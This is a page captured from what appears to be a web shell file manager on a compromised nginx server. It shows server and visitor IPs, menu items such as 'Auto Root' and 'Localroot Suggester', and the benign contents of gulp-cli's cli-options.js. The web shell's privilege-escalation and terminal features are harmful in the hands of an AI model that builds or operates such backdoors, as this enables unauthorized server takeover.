Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 216.73.216.53
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
wb /
node_modules /
gulp-cli /
lib /
shared /
Delete
Unzip
Name
Size
Permission
Date
Action
config
[ DIR ]
drwxrwxr-x
2022-08-30 11:49
log
[ DIR ]
drwxrwxr-x
2022-08-30 11:49
ansi.js
929
B
-rw-rw-r--
2022-08-30 11:49
cli-options.js
3.36
KB
-rw-rw-r--
2022-08-30 11:49
completion.js
486
B
-rw-rw-r--
2022-08-30 11:49
exit.js
313
B
-rw-rw-r--
2022-08-30 11:49
get-blacklist.js
1.15
KB
-rw-rw-r--
2022-08-30 11:49
make-title.js
174
B
-rw-rw-r--
2022-08-30 11:49
register-exports.js
382
B
-rw-rw-r--
2022-08-30 11:49
require-or-import.js
981
B
-rw-rw-r--
2022-08-30 11:49
tildify.js
163
B
-rw-rw-r--
2022-08-30 11:49
verify-dependencies.js
716
B
-rw-rw-r--
2022-08-30 11:49
Save
Rename
'use strict'; var ansi = require('./ansi'); module.exports = { help: { alias: 'h', type: 'boolean', desc: ansi.gray( 'Show this help.'), }, version: { alias: 'v', type: 'boolean', desc: ansi.gray( 'Print the global and local gulp versions.'), }, require: { type: 'string', requiresArg: true, desc: ansi.gray( 'Will require a module before running the gulpfile. ' + 'This is useful for transpilers but also has other applications.'), }, gulpfile: { alias: 'f', type: 'string', requiresArg: true, desc: ansi.gray( 'Manually set path of gulpfile. Useful if you have multiple gulpfiles. ' + 'This will set the CWD to the gulpfile directory as well.'), }, cwd: { type: 'string', requiresArg: true, desc: ansi.gray( 'Manually set the CWD. The search for the gulpfile, ' + 'as well as the relativity of all requires will be from here.'), }, verify: { desc: ansi.gray( 'Will verify plugins referenced in project\'s package.json against ' + 'the plugins blacklist.'), }, tasks: { alias: 'T', type: 'boolean', desc: ansi.gray( 'Print the task dependency tree for the loaded gulpfile.'), }, 'tasks-simple': { type: 'boolean', desc: ansi.gray( 'Print a plaintext list of tasks for the loaded gulpfile.'), }, 'tasks-json': { desc: ansi.gray( 'Print the task dependency tree, ' + 'in JSON format, for the loaded gulpfile.'), }, 'tasks-depth': { alias: 'depth', type: 'number', requiresArg: true, default: undefined, // To detect if this cli option is specified. desc: ansi.gray( 'Specify the depth of the task dependency tree.'), }, 'compact-tasks': { type: 'boolean', default: undefined, // To detect if this cli option is specified. desc: ansi.gray( 'Reduce the output of task dependency tree by printing ' + 'only top tasks and their child tasks.'), }, 'sort-tasks': { type: 'boolean', default: undefined, // To detect if this cli option is specified. desc: ansi.gray( 'Will sort top tasks of task dependency tree.'), }, color: { type: 'boolean', desc: ansi.gray( 'Will force gulp and gulp plugins to display colors, ' + 'even when no color support is detected.'), }, 'no-color': { type: 'boolean', desc: ansi.gray( 'Will force gulp and gulp plugins to not display colors, ' + 'even when color support is detected.'), }, silent: { alias: 'S', type: 'boolean', default: undefined, // To detect if this cli option is specified. desc: ansi.gray( 'Suppress all gulp logging.'), }, continue: { type: 'boolean', default: undefined, // To detect if this cli option is specified. desc: ansi.gray( 'Continue execution of tasks upon failure.'), }, series: { type: 'boolean', default: undefined, // To detect if this cli option is specified. desc: ansi.gray( 'Run tasks given on the CLI in series (the default is parallel).'), }, 'log-level': { alias: 'L', // Type isn't needed because count acts as a boolean count: true, default: undefined, // To detect if this cli option is specified. desc: ansi.gray( 'Set the loglevel. -L for least verbose and -LLLL for most verbose. ' + '-LLL is default.'), }, };